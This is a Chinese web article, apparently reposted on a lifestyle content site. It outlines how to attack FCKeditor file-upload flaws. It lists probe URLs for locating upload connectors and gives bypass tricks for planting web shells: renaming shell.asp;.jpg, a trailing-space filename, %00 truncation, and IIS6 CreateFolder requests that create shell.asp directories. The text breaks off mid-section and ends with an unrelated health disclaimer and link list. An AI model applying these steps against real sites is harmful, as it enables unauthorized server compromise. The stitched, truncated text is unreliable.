
文章插圖
一. 關于FCKeditor
FCKeditor是一個網頁文本編輯器,在很多的內容管理系統(tǒng)里都有用到
本文簡單介紹通過FCKeditor上傳漏洞進行攻擊的思路,并對可能用到的操作進行整理
二. 攻擊思路
1.查看FCKeditor版本
http://127.0.0.1/fckeditor/editor/dialog/fck_about.html
http://127.0.0.1/FCKeditor/_whatsnew.html
2.測試上傳點
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
FCKeditor/_samples/default.html
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/conne
ctor.php
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/conne
ctor.asp
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/conn
ector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/conne
ctor.jsp
FCKeditor/editor/filemanager/browser/default/browser.html?
type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=connectors/jsp/connector.jsp
fckeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=connectors/aspx/connector.Aspx
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Con
3.突破限制
3.1 上傳限制
上傳限制的突破方式很多,主要還是抓包改擴展名,%00截斷,添加文件頭等
3.2 文件名限制
3.2.1二次上傳繞過文件名‘ . ’ 修改為‘ _ ’
FCK在上傳了諸如shell.asp;.jpg的文件后,會自動將文件名改為shell_asp;.jpg ??梢岳^續(xù)上傳同名
文件,文件名會變?yōu)閟hell.asp;(1).jpg
3.2.2提交shell.php+空格繞過
空格只支持windows系統(tǒng),linux系統(tǒng)是不支持的,可提交shell.php+空格來繞過文件名限制 。
3.3 IIS6.0突破文件夾限制
Fckeditor/editor/filemanager/connectors/asp/connector.asp?
Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
FCKeditor/editor/filemanager/connectors/asp/connector.asp?
Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=124478997568
4
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?
Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
3.4 文件解析限制
通過Fckeditor編輯器在文件上傳頁面中,創(chuàng)建諸如1.asp文件夾,然后再到該文件夾下上傳一個圖片的
以上關于本文的內容,僅作參考!溫馨提示:如遇健康、疾病相關的問題,請您及時就醫(yī)或請專業(yè)人士給予相關指導!
「愛刨根生活網」www.malaban59.cn小編還為您精選了以下內容,希望對您有所幫助:- 3dmax把圖片拉進來后建模 3dmax導入jpg圖片建模
- ftp上傳文件失敗原因解說 ftp傳輸文件失敗的原因
- pdf中的圖片導出的方法 pdf中的圖片如何導出
- 什么是低碳生活圖片
- h5文件上傳插件教程 h5文件上傳插件
- pdf轉word變成圖片無法編輯 pdf轉word是圖片怎么辦
- word文檔轉換成圖片的方法 怎么把word保存成圖片
- word圖片導出原圖 word文檔里面的圖片怎么導出來
- 史上最牛的ppt插件 ppt轉高清圖片的插件
- 綠豆會長大成什么樣子圖片
